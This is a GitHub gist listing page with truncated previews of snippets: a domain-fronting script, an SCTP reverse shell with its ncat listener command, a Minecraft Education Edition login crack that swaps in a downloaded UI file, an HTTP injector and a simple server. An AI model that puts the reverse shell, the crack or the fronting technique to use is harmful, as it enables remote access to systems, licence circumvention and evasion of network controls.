Skip to content

Instantly share code, notes, and snippets.

View MC874's full-sized avatar
🔥
24 Hours is unsufficient time.

MC MC874

🔥
24 Hours is unsufficient time.
View GitHub Profile
@MC874
MC874 / domain_fronting.py
Created November 22, 2024 13:56 — forked from jobec/domain_fronting.py
How to do domain fronting in Python with Requests. Send a request to an arbitrary IP address and force the SNI field and Host HTTP header to a certain value.
#
# How to do domain fronting in Python with Requests.
#
# Send a request to an arbitrary IP address and force the
# SNI field and Host HTTP header to a certain value.
#
import http.client
import requests
import urllib3
@MC874
MC874 / Login Progress Pointer Paths.
Created November 22, 2024 13:55
Login Progress Pointer Paths.
/// DEBUG SCREEN CRACK (RECOMMENDED) ///
1.7-1.20 (Win32-UWP-Android):
https://cdn.discordapp.com/attachments/1090766119326994502/1102104352530898975/debug_screen.json
Copy this file to: "Minecraft Education Edition/data/resource_packs/vanilla/ui" and replace it
/// PTR CRACK (Partially fixed since 1.18.42) ///
1.19.52.0 (Win32):
@MC874
MC874 / sctp_reverse_shell.py
Created November 22, 2024 13:53 — forked from hyperreality/sctp_reverse_shell.py
Simple Python reverse shell using the SCTP protocol
#!/usr/bin/env python3
#
# Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765
# Connect with `ncat --sctp -lvp 1234`
import os, socket, subprocess
RHOST = '127.0.0.1'
RPORT = 1234
@MC874
MC874 / SimpleServer.py
Created November 22, 2024 08:20 — forked from vitouXY/SimpleServer.py
Simple Server ; QPython
#!/usr/bin/env python2
#!/usr/bin/python2
#-*-coding:utf8-*-
#qpy:console
""" SimpleServer.py -h
Original Version By InunxLABS 1.00.10 - 22/07/13
Mail : inunxlabs@gembox.us
Paypal : inunxelex@yahoo.com
Payza : inunxlabs@gmail.com
@MC874
MC874 / HTTPInjector.py
Created November 22, 2024 08:13 — forked from vitouXY/HTTPInjector.py
HTTP Injector ; QPython
#!/usr/bin/env python2
#!/usr/bin/python2
#-*-coding:utf8-*-
# coding=utf-8
#qpy:console
"""
HTTP Injector Python
https://stackoverflow.com/questions/43341946/injector-python-http-proxy-basic-proxy-authentication
+++ Inject Payload
@MC874
MC874 / aosbrrs.md
Created July 9, 2022 00:59
Archive of some Bedrock Edition related stuff